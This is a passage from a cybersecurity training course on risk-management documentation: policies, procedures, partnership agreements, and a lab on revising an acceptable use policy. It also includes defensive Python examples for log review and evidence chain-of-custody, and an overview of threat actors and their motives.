Acceptable use policy: Defines a set of rules and restrictions for how various internal and external stakeholders may behave with respect to the organization's assets. These policies typically outline general or specific behaviors the organization believes will either reduce, increase, or have no effect on risk. In most cases, stakeholders are expected to comply with an acceptable use policy, and if they violate any of its terms, may be subject to punitive actions (e.g., employment termination).

Account management policy: Outlines the responsibilities administrators have in keeping various identity data secure and supportive of business objectives. Such policies define expected behavior in how an external or internal user's identity is created, altered, and deleted with respect to organizational systems.

Password policy: A subset of account management policies that defines rules for how users generate and maintain account credentials. It typically sets restrictions such as the minimum number of characters in a password, the required level of password complexity, and how often passwords must be changed. Password policies attempt to reduce the risk of password cracking attempts. Note that current guidance (NIST SP 800-63B) favors longer passwords screened against lists of known-compromised passwords over composition rules and scheduled rotation, because forced periodic changes tend to produce weaker, predictable passwords; a password policy should be reviewed against that guidance rather than copied from older templates.

Data ownership policy: Outlines how information in the organization is assigned to "owners," that is, personnel who are ultimately responsible for keeping that information secure and accessible by authorized parties only. These types of policies help an organization ensure that all data is accounted for and that each owner understands what is expected of them.

Data classification policy: Outlines how an organization chooses to categorize the different levels of data sensitivity. The organization can triage its security efforts based on what data will bring the most risk if it were leaked or tampered with.

Data retention policy: Stipulates how and when an organization should store data within its systems, and how and when the organization should purge that data. This is especially important if the organization handles PII or PHI, which are often subject to regulatory and legal restrictions.

Communication policy: Outlines how members of a team or an organization are to communicate with each other or communicate with external parties. This helps set parameters for what is and is not acceptable to discuss. It also helps make communication easier by providing clear paths for escalation.

Types of Procedures
The following table includes examples of common security procedures found in many organizations.

Procedure Description

Patching: Security researchers, development teams, and attackers discover new vulnerabilities in software all the time, even if that software has been around for years. Patching is therefore a vital procedure that keeps these vulnerabilities from being exploited by a malicious user. In an organization, patching procedures are often not just a simple press of an update button or even an automated process. Security and other IT personnel may need to thoroughly test patches before they push them out to production systems, ensuring that the changes in software do not impact operations in a negative way.

Compensating control development: A compensating control is a security measure put into place to mitigate a risk when a primary security control fails or cannot completely meet expectations. For example, a primary control may be that a host generates an alert to an administrator when it detects suspicious behavior, like repeated failed login attempts. However, there is the possibility that the alert won't reach the administrator for whatever reason or that the host won't alert on the action at all. Manually reviewing logs like syslogs/event logs, authentication logs, and firewall logs is therefore a compensating control because a human being may be able to spot suspicious behavior that the automated system failed to see. You can also develop compensating controls to support primary controls, not just to replace them when necessary. For example, engaging in data analytics can help strengthen an existing tool or system. Security personnel can perform trend analysis and historical analysis to predict future behaviors that a static tool might not be able to, and personnel can also aggregate and correlate data to supply that tool with a more complete perspective of events.

Control testing procedures: Just like testing patches, organizations may need to outline procedures for testing planned or existing security controls. These procedures must test the control's efficacy at reducing risk, and weigh that against its cost. Control testing procedures are best performed not just once, but continuously, so that you can identify when the control is lagging behind the changing technological landscape or when it is no longer meeting changing business needs.

Remediation planning: When a security assessment or other review identifies problem areas in the organization, there should be a plan in place to remediate these issues. Remediation plans typically include steps to remove or suspend a system from production while the error is corrected; this must be done in a way that avoids disruption as much as possible. Remediation plans may also include common steps to implement the correction itself, assuming it is a known solution. Otherwise, the plan may need to provide more generalized steps for a new and untested solution.


Exception management: In this context, an exception is any circumstance that makes it difficult for an organization to carry out standard remediation procedures. As an example, an organization may have legacy software that is integral to business operations. A security assessment identifies several vulnerabilities in the application programming interfaces (APIs) and libraries it uses. Normally, the corrective action would just be to update these APIs and libraries, but this will essentially break the legacy application. Rewriting code in the legacy application to make it work with these updates isn't entirely feasible, either. This is an exception to the remediation process. Strong exception management procedures will anticipate issues like this, and will instruct personnel as to the best course of action. In the aforementioned example, security personnel will need a plan in place to inform higher-level decision makers as to their choices: either accept the risk or scrap the legacy application and look for a new solution. The exception management plan may also provide security personnel with compensating controls that don't quite mitigate the risk, but at least reduce it somewhat or transfer it elsewhere. Every exception should be recorded with a named owner and an expiry date at which it is re-reviewed, so that a temporary acceptance of risk does not quietly become permanent.

Evidence production: To support the forensic investigation process when it is needed after a security incident, the organization should develop procedures for collecting and producing evidence. Depending on the circumstances of the incident, this evidence may be kept internal, but it also may need to be presented to a third-party legal entity. Procedures should ensure the evidence upholds integrity and is authenticated at every step of the process, so that its relevance and accuracy cannot be called into question. In practice this means hashing each artifact when it is acquired, recording who handled it and when (the chain of custody), and re-verifying the hash each time it changes hands.
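
The compensating control described above (a person or script reviewing authentication logs because the host's own alerting may fail) can be made repeatable. The following Python script is an added example written for this edition, not part of the course materials or its data files. It parses a few constructed sshd-style syslog lines, counts failed logins per source address within a sliding time window, and flags any source that crosses a threshold, also noting whether a successful login followed the failures (the case a first responder most wants to see). The host name, addresses, user names, and the five-failures-in-five-minutes threshold are assumptions made for the example.

```python
"""Review authentication log lines for repeated failed logins.

Added example for the compensating-control discussion; not part of the course
materials. The log lines are constructed in the style of OpenSSH sshd messages
written to syslog; the threshold and window are assumptions, not course values.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: syslog-style sshd lines (no year in the timestamp, as in
# traditional syslog). 10.0.0.7 fails five times in under a minute and then
# succeeds; 10.0.0.9 fails once; 10.0.0.20 only ever succeeds.
SAMPLE_LOG = """\
Mar 14 09:12:01 web01 sshd[2011]: Failed password for invalid user admin from 10.0.0.7 port 51022 ssh2
Mar 14 09:12:03 web01 sshd[2011]: Failed password for invalid user admin from 10.0.0.7 port 51022 ssh2
Mar 14 09:12:06 web01 sshd[2014]: Failed password for root from 10.0.0.7 port 51030 ssh2
Mar 14 09:12:09 web01 sshd[2014]: Failed password for root from 10.0.0.7 port 51030 ssh2
Mar 14 09:12:15 web01 sshd[2017]: Failed password for jsmith from 10.0.0.7 port 51044 ssh2
Mar 14 09:12:40 web01 sshd[2017]: Accepted password for jsmith from 10.0.0.7 port 51044 ssh2
Mar 14 09:30:00 web01 sshd[2101]: Failed password for jsmith from 10.0.0.9 port 40112 ssh2
Mar 14 09:31:12 web01 sshd[2105]: Accepted publickey for deploy from 10.0.0.20 port 40200 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and
# "Accepted publickey for X from IP"; other sshd lines are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} [ \d]\d \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \S+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_events(text, year=2024):
    """Return (timestamp, result, user, ip) tuples; silently skips other lines.

    Syslog omits the year, so the caller supplies it (assumed 2024 here)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def find_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: (total_failures, success_after_failures)} for every source
    address that produced at least `threshold` failures inside any `window`."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)

    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [ts for ts, result, _, _ in evs if result == "Failed"]
        # Sliding window over the sorted failure timestamps: `peak` is the most
        # failures that ever fell inside one window for this source.
        start, peak = 0, 0
        for end in range(len(failures)):
            while failures[end] - failures[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_failure = failures[-1]
            success_after = any(
                result == "Accepted" and ts >= last_failure
                for ts, result, _, _ in evs
            )
            flagged[ip] = (len(failures), success_after)
    return flagged


if __name__ == "__main__":
    for ip, (count, success) in find_bruteforce(parse_events(SAMPLE_LOG)).items():
        verdict = "then SUCCEEDED" if success else "no success seen"
        print(f"{ip}: {count} failed logins, {verdict}")
```

Run against a real `/var/log/auth.log` or `journalctl -u ssh` export, the same two functions give a reviewer a short list of sources to look at instead of thousands of lines; the `success_after` flag separates noisy scanners from the one source that guessed a password.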

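The evidence production row above asks that evidence "upholds integrity and is authenticated at every step." The following Python module is an added example written for this edition, not part of the course materials. It shows one way to do that for a collected artifact: hash it at acquisition, keep a chain-of-custody log in a manifest that is itself protected by an HMAC, and re-verify both the artifact hash and the manifest signature at every hand-off so that a modified image or a deleted custody entry is caught at the step where it happens. The artifact bytes, handler names, and signing key are constructed for the example; in a real procedure the key would live in an HSM or secrets store and the artifact would be a file or disk image.

```python
"""Evidence integrity and chain-of-custody manifest.

Added example for the evidence production procedure; not part of the course
materials. Artifact bytes, handler names and the signing key are constructed.
"""
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Constructed for the example: a real procedure keeps this key out of the code
# and out of reach of the people whose handling the manifest is meant to prove.
MANIFEST_KEY = b"example-manifest-signing-key"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sign(entry):
    """HMAC over the canonical JSON of everything except the signature itself,
    so the custody log cannot be edited after the fact without the key."""
    body = {k: v for k, v in entry.items() if k != "sig"}
    canon = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(MANIFEST_KEY, canon, hashlib.sha256).hexdigest()


def acquire(name, data, handler, when=None):
    """Acquisition step: hash the artifact once and open the custody log."""
    ts = (when or datetime.now(timezone.utc)).isoformat()
    entry = {
        "name": name,
        "sha256": sha256_hex(data),
        "size": len(data),
        "custody": [{"action": "acquired", "by": handler, "at": ts}],
    }
    entry["sig"] = sign(entry)
    return entry


def verify(entry, data):
    """True only if the manifest is unmodified AND the artifact still matches."""
    sig_ok = hmac.compare_digest(entry.get("sig", ""), sign(entry))
    return sig_ok and entry["sha256"] == sha256_hex(data)


def transfer(entry, data, from_handler, to_handler, when=None):
    """Hand-off step: verify first, then append to the custody log and re-sign.

    Raises if the artifact or manifest no longer checks out, so a break in
    integrity is recorded at the step where it was found, not discovered later."""
    if not verify(entry, data):
        raise ValueError(f"integrity check failed for {entry['name']} at hand-off")
    ts = (when or datetime.now(timezone.utc)).isoformat()
    entry["custody"].append(
        {"action": "transferred", "from": from_handler, "to": to_handler, "at": ts}
    )
    entry["sig"] = sign(entry)
    return entry


def demo():
    """Constructed walk-through: acquire, hand off, then detect two tampering
    cases (artifact altered; custody entry deleted from the manifest)."""
    image = b"\x00" * 512 + b"constructed disk image fragment"
    t0 = datetime(2024, 3, 14, 9, 30, tzinfo=timezone.utc)
    entry = acquire("web01-sda.img", image, "analyst.a", when=t0)
    transfer(entry, image, "analyst.a", "evidence.locker", when=t0)
    intact = verify(entry, image)
    tampered = verify(entry, image + b"x")                # artifact modified
    edited = dict(entry, custody=entry["custody"][:1])    # hand-off erased
    log_edited = verify(edited, image)
    return intact, tampered, log_edited, len(entry["custody"])


if __name__ == "__main__":
    print(demo())  # (True, False, False, 2)
```

The manifest, not the artifact, carries the chain of custody, which is why the HMAC covers the custody list: a plain hash of the image proves the bytes are unchanged but says nothing about who touched it. For evidence that may go to a third party, the same entries would be printed and countersigned at each hand-off as well.
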
Business Documents That Support Security Initiatives

There are several common types of business documents an information assurance professional should expect to encounter in their normal duties. Many of these focus on business partnerships, alliances, and vendor contracts. Since all organizations do business with other entities, there are many types of common agreements used to govern those relationships. Some of these agreements specifically deal with security and risk management, whereas others may incorporate them secondarily or not at all.

Document Description

Master service agreement (MSA): Lays the groundwork for any future business documents that two parties may agree to. The purpose of an MSA is to expedite the agreement process as the relationship between each business partner grows. Organizations may use an MSA to eliminate redundancies that arise when the partner organizations form multiple agreements, like those listed in the rest of the table.

Statement of applicability (SOA): Identifies the controls in place in an organization and explains their purpose. As SOAs identify why a particular control is being used, they are often directly influenced by the conclusions reached in a risk assessment. The SOA should reference the policies and procedures that will take advantage of the identified controls. It is beneficial to not only explain why a certain control was included, but to also explain why certain controls were excluded; this is a requirement in ISO/IEC 27001, where the term originates.

Business impact analysis (BIA): Identifies present organizational risks and determines the impact to ongoing, business-critical operations and processes if such risks actually occur. BIAs contain vulnerability assessments and evaluations to determine risks and their impact. BIAs should include all phases of the business to ensure a strong business continuation strategy.

Interoperability agreement (IA): General term for any document that outlines a business partnership or collaboration in which all entities exchange some resources while working together.

Interconnection security agreement (ISA): Geared toward the information systems of partnered entities to ensure the use of inter-organizational technology meets a certain security standard for CIA. Because they focus heavily on security, ISAs are often written to be legally binding. ISAs can also support MOUs (see next entry) to increase their security viability. NIST provides Special Publication 800-47, Managing the Security of Information Exchanges, as guidance for developing an interconnection plan.

Memorandum of understanding (MOU): Usually not legally binding and typically does not involve the exchange of money. MOUs are less formal than traditional contracts, but still have a certain degree of significance to all parties involved. They are typically enacted as a way to express a desire for all parties to achieve the same goal in the agreed-upon manner. An MOU document might contain background information on each organization; the history of the relationship between the two organizations and circumstances that led to the partnership; and a general or specific timeline for collaborative business activities. Because they typically have no legal foundation, MOUs are not the most secure agreement for a partnership.

Service-level agreement (SLA): Clearly defines what services are to be provided to the client, and what support, if any, will be provided. Services may include everything from hardware and software to human resources. A strong SLA will outline basic service expectations for liability purposes. The document may include time frames within which failures will be repaired or serviced; guarantees of uptime; or, in the case of a network provider, guarantees of data upload and download rates.

Operating-level agreement (OLA): Identifies and defines the working relationships between groups or divisions of an organization as they share responsibilities toward fulfilling one or more SLAs with their internal or external customers.

Non-disclosure agreement (NDA): An agreement between entities stipulating they will not share confidential information, knowledge, or materials with unauthorized third parties. NDAs also commonly state in which cases, if any, data may be used or processed by the receiving entity. An NDA generally cannot restrict information that is already public or that the receiving party obtained independently, so it is not enforceable for data acquired through public sources.

Business partnership agreement (BPA): Defines how a partnership between business entities will be conducted, and what exactly is expected of each entity in terms of services, finances, and security. For security purposes, BPAs should describe exactly what the partners are willing to share with each other, and how any inter-organizational access will be handled.

Note: Certain documents, particularly those used in vendor agreements, may require the client
organization to fill out a questionnaire in order for the vendor to ascertain various information
about the client's current status and its needs.

Note: An example of an interconnection standard is the PSN Code of Interconnection (CoICo). This UK government standard applies to connectivity services provided by commercial suppliers. The standard can be found at https://www.gov.uk/government/publications/psn-code-of-interconnection-coico.

Guidelines for Integrating Documentation into Risk Management


Follow these guidelines to integrate documentation into your risk management strategies.

Integrate Documentation into Risk Management

When integrating documentation into your risk management strategies:

• Download free policy templates to make crafting a policy easier.
• Consider hiring a consultant if your organization can't support the internal development of policies.
• Use direct, concise language and dispense with legal jargon in policies.
• Include business leaders in policy development and make sure executive management approves the policy before it is enforced.
• Support policies with clearly defined processes and procedures.
• Make processes and procedures easy to follow and tailor them toward your audience's technical aptitude.
• Compare and contrast policies, processes, and procedures with those of other organizations.
• Consider policies, processes, and procedures to be living documents; that is, subject to change as businesses and technology evolve.
• Incorporate best practices like job rotation, mandatory vacations, and user training into your policies based on your specific organizational requirements.
• Involve HR, legal counsel, management, and other entities in the policy development process to get unique perspectives.
• Ensure that policies have provisions for legal and regulatory compliance.
• Identify any sensitive PII your organization handles.
• Be up front with your clients about how their PII will be used and for what purpose.
• Advise your clients on best practices to maintain privacy.
• Identify the various business documents and agreements applicable to your organization's needs.
• Use a legally binding agreement, such as an SLA or ISA, in any partnership that requires strong security and legal and financial liability.

ACTIVITY 1-4
Integrating Documentation into Risk Management

Data File
C:\CNX0013Data\Assessing Cybersecurity Risk\dtech_aup_v1.docx

Before You Begin
You have a Microsoft Windows® 10 computer to complete some of the activities in this course. This client is a domain member in develetech.internal. You also have a Windows Server 2019 computer running as a domain controller.

Note: Activities may vary slightly if the software vendor has issued digital updates. Your instructor will notify you of any changes.

Scenario
On more than one occasion, unknown and unauthorized users have tricked Develetech's help desk employees into divulging sensitive information and exposing their workstations and the network to malicious activity. For example, users have been sending the help desk emails enticing the employees to click on links to malicious websites. These sites execute scripts on the employees' computers that make their systems sluggish and unresponsive. Additionally, some malicious users have been contacting help desk employees through their private Facebook and Skype® accounts. The employees have been implicitly trusting anyone with knowledge of these accounts, giving away sensitive company information over unauthorized communication channels.

You decide to review Develetech's acceptable use policy so that both help desk and regular staff know what kind of behavior is and is not allowed with regard to communications. Instead of starting from scratch, you'll make minor adjustments to an existing policy that has most of the items you need already in place.

Instructor notes: Make sure that you give students their assigned numbers for the class. Steps in this activity will vary if a word processing program other than LibreOffice Writer is used. This is one example of a security policy template; you may choose a different policy for students to fill out, and, time permitting, have students fill out multiple policies. Notify students of any changes to activities based on digital software updates issued by the software vendor.

1. View some security policy templates.

a) Log on to Windows 10 as DEVELETECH\student## with a password of Pa22w0rd
b) On the desktop taskbar, select the Microsoft Edge icon to open the browser.

Note: You can close any welcome messages that appear.

c) Navigate to https://www.sans.org/information-security-policy/.
d) Under the Filters section, check the General check box.
e) Verify that there are several general security policy templates available.

f) Select any of the template options to see more information about the template.
There is a description of the template, as well as links to its PDF or DOC file.
g) Select one or two of the other general security templates that interest you. Change the filter to view templates in other categories.

2. Open the acceptable use policy template.

a) Select the File Explorer icon and navigate to C:\CNX0013Data\Assessing Cybersecurity Risk\LibreOfficePortable.

Note: Consider pinning the C:\CNX0013Data folder to Quick access in File Explorer. You can do this by right-clicking the folder and selecting Pin to Quick access.

b) Double-click LibreOfficeWriterPortable.exe to open an alternative to Microsoft Word.
c) In the Tip of the Day message box, select OK.
d) From the menu, select File→Open.
e) From the course data files, open dtech_aup_v1.docx.

Note: This policy is available on the SANS Institute's website, but is included with the data files for consistency.

f) Verify that the policy document opens.

3. Review the overview and purpose of the policy and verify that it outlines both acceptable and unacceptable behavior for all users to protect the organization and its employees.

4. Scroll down to section 4.3 and review the unacceptable use policy items.

5. What are some other acceptable or unacceptable behaviors you can incorporate in a policy like this one?


A: Answers will vary, but you could further assist help desk employees in defending against attacks by forbidding communication using unauthorized channels like private Facebook and Skype accounts. You can also take a more positive approach by outlining acceptable behavior when it comes to the content of a help desk request; for example, the information that should be included in an email request so that it's both useful to the help desk employee and secure at the same time. Likewise, you can encourage or mandate signed and encrypted email (for example, S/MIME) so that requests carry some measure of authentication as well as confidentiality; encryption alone does not tell the help desk who actually sent the request.
6. Add an unacceptable behavior example you've seen from Develetech's help desk staff.
a) Place your cursor at the end of the 4.3.2 item number 7 and press Enter.
b) Add a number 8 item with the following text:
8. Use of unauthorized communication channels to contact help desk staff, including, but not limited to, private Facebook and Skype accounts.

Instructor note: If you prefer, have students add or modify the policy items to their liking. If necessary, help students with formatting, but make sure they don't get bogged down by trying to make the document look as appealing as possible.

7. Add your revision to the revision history.
a) Scroll down to the Revision History section and examine the table.
b) In the second row, in the Date of Change column, type today's date.
c) In the Responsible column, type your name.

d) In the Summary of Change column, type Added item 8 to email and communication activities.
e) Save the document to the desktop as dtech_aup_v2.docx.
f) When prompted to confirm the file format, select Use Word 2007–365 Format.

8. Why is it important to maintain a revision history in policies like this one?

A: Answers may vary, but security policies, procedures, and processes are living documents. This means that, in the event of newly identified threats or vulnerabilities, you can adjust the document accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are unhelpful to their intended audience. Recording a revision history will ensure there is a trail of changes and that each change is known in the context of when it was made, and that the person(s) who made the changes are held accountable.

9. Close all open windows.

Summary
In this lesson, you identified why the risk management process is important, and went through the process by assessing and mitigating risk across a wide range of factors. You also reinforced your risk management strategy through documentation. The information you learned in this lesson will give you a foundation for understanding and applying security in your organization.

Instructor Note: Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

At your workplace or one you're familiar with, what security risks are there, and what risks do you envision for the future of the organization?

A: Answers will vary. Depending on the industry, the information they work with, and the business they do, students may see risk to an organization's finances, physical assets, intellectual property, reputation, legal compliance, and other factors. Depending on how they envision their organization evolving, students may anticipate new risk, additional risk in the same category, or even less risk.

What sort of documentation do you have in your organization or an organization you're familiar with to support risk management? What other documentation should there be?

A: Answers will vary. Some students will have policies regarding information storage, network usage, employee awareness and training, and legal compliance. They may also have individual procedures for security personnel and employees to follow in order to enforce security. If students' organizations are in a partnership or are looking to develop such a relationship, they should also consider drafting agreement documentation, like an ISA.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.
2 Analyzing the Threat Landscape

Lesson Time: 1 hour, 50 minutes

Lesson Introduction
Now that you have a foundational understanding of the importance of risk management, you're ready to begin meeting security problems head-on. You need to figure out just what and who it is you're up against as you defend your organization from harm. The threat landscape is huge, diverse, and most important of all, ever-changing. By analyzing the very nature of threats to your organization, you can obtain crucial knowledge to aid in the active defense of your computing and network environments.

Lesson Objectives
In this lesson, you will:

• Compare, contrast, and categorize cybersecurity threats.

• Analyze current trends in security and how they affect the organization's security posture.

TOPIC A
Classify Threats
Part of any solid defense is understanding your opposition. As a cybersecurity practitioner, you'll need to get into the minds of those that threaten your organization. In doing so, you'll start to see patterns of behavior you can anticipate. You'll subsequently be able to save yourself time, effort, and resources in protecting your assets.

Threat Actors
Instructor Note: Consider demonstrating real-world examples of threat actors by using a security blog such as Krebs on Security.

An attacker is also known as a threat actor. It's important not to think of threat actors as some faceless, monolithic entity; on the contrary, they are as diverse as their targets. Threat actors have various methods of operation, motivations, and intentions. When you understand who is attacking you, why, and how, it'll be easier for you to implement the correct actions to oppose these threats. Thinking of all attackers as the same will only keep you ignorant, and the more ignorant you are of the threat landscape, the greater disservice you do to the security of your organization.
Also keep in mind that these days, most attacks (particularly high-profile attacks) are carried out by groups of people. So, the term "threat actor" can refer to multiple people working in concert instead of just a single person working alone.

To begin with, it can be helpful to categorize threat actors as in the following table.

Threat Actor: Description

Insiders: An insider is any attacker who has or had a close business relationship with their target. Current employees may abuse their access and privileges to steal from their employer or blackmail and harass certain members of the company. Likewise, disgruntled former employees may use their knowledge of a former employer's computer systems to their advantage even if they no longer have authorized access.
Either way, insiders, even if they are unskilled, can cause a considerable amount of damage to the organization because of their unique position of trust. In many cases, insiders are more common culprits and are more successful than external actors.

Script kiddies: Script kiddies are inexperienced, unskilled attackers that use tools and scripts created by others. The term is primarily derogatory and used to criticize an attacker as having childish motives with a limited appreciation of the technical aspect of their attacks.
Because of their inexperience, script kiddies are usually less of a significant threat than more seasoned and knowledgeable attackers; however, with the right tools, they can still cause a great deal of damage. This is especially true considering how easy it is to acquire freely available attack tools from the Internet. Nevertheless, script kiddies are more likely to unknowingly leave behind traces of their attack.

Lesson 2: Analyzing the Threat Landscape | Topic A


Recreational hackers: Recreational hackers are typically more experienced than script kiddies, and will often treat cyber attacks as a hobby and therefore do it consistently. They are not always interested in causing massive amounts of damage, but will occasionally take more subtle approaches to demonstrate their skill and aptitude.
Not all recreational hackers are malicious, but those that are can be formidable foes precisely because they often see cyber attacks as a game or challenge to be bested. However, this also means that they are repeat offenders, and take progressively greater risks.

Professional hackers: Professional hackers are paid by some entity to do a job, and as such, they are typically more skilled and devoted to their craft than most recreational hackers or script kiddies.
Like recreational hackers, not all professional hackers are malicious; indeed, many are employed by organizations to conduct penetration tests for the purpose of evaluating the organizations' security. The malicious variety, however, are usually paid by competing organizations to attack their rivals, or by disgruntled individuals who have a grudge against an organization but do not themselves possess the required level of hacking skill. Professional hackers are a significant threat that should not be taken lightly.

Cybercriminals: Like professional hackers, cybercriminals receive money for a job; but rather than being paid by a third party, they typically steal money from their target during the attack itself. Cybercriminals can have varying levels of expertise, but the truly successful ones that evade detection are technically skilled.
The focus of a cybercriminal's attack is usually monetary theft, but they may also commit crimes such as identity theft, fraud, blackmail, etc.
Many cybercriminals join online cybercrime rings to sell or purchase stolen goods, accounts, and services within a like-minded community.

Hacktivists: "Hacktivist" is a portmanteau of "hacker" and "activist," implying that the threat actor is primarily motivated by social issues. This distinction does not indicate any particular level of skill, but it does suggest that the attacker is personally committed to an attack.
The hacktivist is often convinced their behavior is ethical and not malicious, and they are more likely to launch attacks on organizations or people who they believe violate principles such as freedom of expression and other human rights.
Hacktivists may be solo or work in groups; the most well-known hacktivist group is Anonymous, a loosely organized network of hackers and those who support its ideals.

State-sponsored hackers: Individual nations, or even groups of nations, may employ hackers in order to conduct a wide range of attacks. The hackers these countries employ are almost always skilled and may even have access to powerful tools and resources that a typical professional hacker does not. State-sponsored hackers engage in espionage, sabotage, censorship, and more—all of which can be aimed at both external and internal targets.

Cyberterrorists: Like terrorism itself, cyberterrorism is a controversial term that often means many different things to many different people. More broadly, it is characterized as an attack on computer systems for the purposes of damaging those systems and spreading fear.
Cyberterrorists are often motivated by political purposes, and their techniques may be indistinguishable from hacktivists and state-sponsored hackers. Like those threat actors, they are usually skilled at hacking.

Threat Motives
Each threat actor will have one or more overarching reasons for conducting an attack on your systems. The different types of actors you encountered in the previous table may be more predisposed to one type of motive over another, but it can still be difficult to pin down why a person or group of people are targeting your organization. When you understand how certain motives influence other dimensions of an attack, you begin to more clearly see why it's an essential piece of information. For example, an attacker who is motivated by revenge may be more emotional and reckless in their behavior, giving you a greater chance of catching them in a mistake. On the other hand, a dispassionate attacker simply looking to steal sensitive information may be more predictable based on certain logical patterns.
The following table lists some of the most common threat motives in cybersecurity.

Threat Motive: Description

Desire for money: This is the most common motivation for any type of threat actor, especially career cybercriminals. Attackers who desire money will go after both individuals and organizations in a variety of different ways. Sometimes, the attacker can go through an organization to get to a user's money, or vice versa. Personal bank accounts and company financial resources are popular targets because they can immediately provide the attacker with stolen money.
However, more patient attackers may steal sensitive information and trade secrets to then turn this information around and sell to the highest bidder. Just because an attack doesn't appear immediately profitable, that doesn't mean it can't be in the long run.
Attackers who desire financial gain are typically more rational and experienced and are less likely to make mistakes.

Desire for power: Some threat actors care less about monetary gains and more about exercising control over another person or group of people. This is especially true of cyberterrorists and insiders, who may be taking revenge if they believe they've been wronged. Others may have no particular ill feelings toward their targets, but simply crave taking control of a business's assets or person's identity.
Attackers may damage computer systems simply to demonstrate that they have the power to do so; but just as often an attacker will take over a perfectly functioning system to use to their own ends, or they may transfer data to their custody and destroy the data elsewhere. This can often lead to extortion attempts as the attacker holds the data for ransom.
Attackers with this motivation are often reckless.

Reputation/recognition: Instead of desiring direct control, some attackers will seek to gain a reputation among a group of people. This is especially true among recreational hackers who want to prove themselves to hacking communities. They seek to overcome the script kiddie label and be recognized as truly skilled hackers. They'll often target increasingly larger and harder targets to impress others, without necessarily caring about financial gain or holding control over an organization.
Some aren't seeking acceptance in a particular community, but simply want to be seen as a dangerous or interesting person by anyone and everyone. Like those that desire power, attackers motivated by reputation may act carelessly and with little regard to discretion.

Association/affiliation: Similar to those that seek recognition, an attacker may also seek inclusion in a group simply to be part of something greater than themselves. This is often the case when it comes to hacktivists, cyberterrorists, and state-sponsored hackers—essentially, anyone with an overriding political or social cause. The attacker identifies very closely with the ideals of the community they've allied with, and may see themselves as merely an extension of those ideals.
Despite being motivated for less selfish reasons, this type of attacker may still exhibit behavior that is more emotional than logical. At the same time, this affiliation enables them to be more anonymous and draw less attention to themselves.

Fun/thrill/exploration: Rather than any particularly dramatic reason, some people simply attack systems because it's fun to them. This may be based on some sort of perceived challenge, or it could be a way for them to develop their skills as a hacker. Another possibility is that they're new to the world of cybersecurity altogether, and simply want to try what they've been hearing so much about.
Attackers with this motivation are therefore usually less dangerous than the others, and they may not even be malicious at all. Nevertheless, they can still inadvertently cause harm to the organization, and you should treat them seriously as threat actors.

Revenge: Some attackers simply want to right a perceived wrong done to them. They feel slighted by something they believe an individual or organization has done, and may be motivated to take malicious action. Everyone from existing cybercriminals to insiders and script kiddies can be motivated by revenge—there is not necessarily one skill level that is common to revenge attacks.
Attackers motivated by revenge exhibit behavior that is almost purely emotional. On one hand, this could prompt the threat actor to be more destructive than someone motivated by other reasons; on the other hand, the threat actor is likely to be reckless and may make significant mistakes that could lead to their downfall.


Human Error
Although not a motive per se, human error can still be the reason for an attack. In some cases, a threat actor may become a threat actor purely by accident. An end user may click the wrong link and open their workstation up to malicious software; a system administrator may execute the wrong command during a standard recovery test and may end up taking down more systems than they should have; a network administrator may configure a wireless access point (WAP) improperly, inviting unauthorized users to connect to the network; and so on.

Threat Intentions
Instructor Note: Consider mentioning that motives and intents often align, though this is not always the case. For example, someone might intend to steal from an organization and have a primary motive of revenge, not necessarily a desire for money.

Just as the motivations of threat actors differ, so too do their ultimate goals. Knowing exactly what an attacker is after can help you decide who and what to protect. It can also help you recognize attack patterns that you can use to anticipate and mitigate the effects of an attack. Intentions are almost always an extension of motives; if you know why someone is prepared to attack you, you will have an easier time identifying what they'll actually do. Analyzing both in the same context can provide you with valuable insight into the minds of the threat actors that target your organization.
The following table lists some of the most common intentions of threat actors.

Threat Intention: Description
Theft: Theft is the most common goal for threat actors that desire money. In the world of computers, the most lucrative item is information. Thieves look to steal credit card and financial information, personally identifiable information (PII), or any piece of data that may enrich the attacker while robbing the victim of money, credibility, market position, and many other necessary components of business.
Thieves may be more inclined to target high-profile information, like your customers' private data, or they may prefer more subtle targets that are less likely to call attention to themselves. In either case, theft is the most popular and often the most devastating goal of a cyber attacker. A business that has its bottom line compromised may not be able to recover.

Espionage: Espionage tends to come in two types: state sponsored and industrial. The former is typically carried out by hackers that are in the employ of a government, and their targets can range from internal (its own citizens) to external (foreign governments and their citizens). The latter is initiated by an organization and targets other organizations in the same industry (typically competitors).
A trade secret, like the technical details of a developing product, can cost an organization time and money if a competitor is able to capitalize on this information and beat them to the market. Likewise, a nation that spies on another may be able to glean its military or economic plans, making them easier to prepare for and counteract.

Defamation of character: Defamation of character is commonly a tactic of those looking for revenge; they may attempt to expose their targets as incompetent or immoral. However, a threat actor may defame an organization or an individual not out of spite, but simply as a form of sabotage. The attacker will spread information that may either be true or false that the organization or individual doesn't want public, which could cost the organization its reputation or the individual their job.
Either of these scenarios will weaken the target and may provide an opportunity on which the attacker can capitalize. For example, someone looking for a promotion in their department may impersonate a fellow employee also up for the same promotion. During this impersonation, they may represent the victim negatively, and the manager may react by denying the victim their promotion, giving it to the attacker instead.


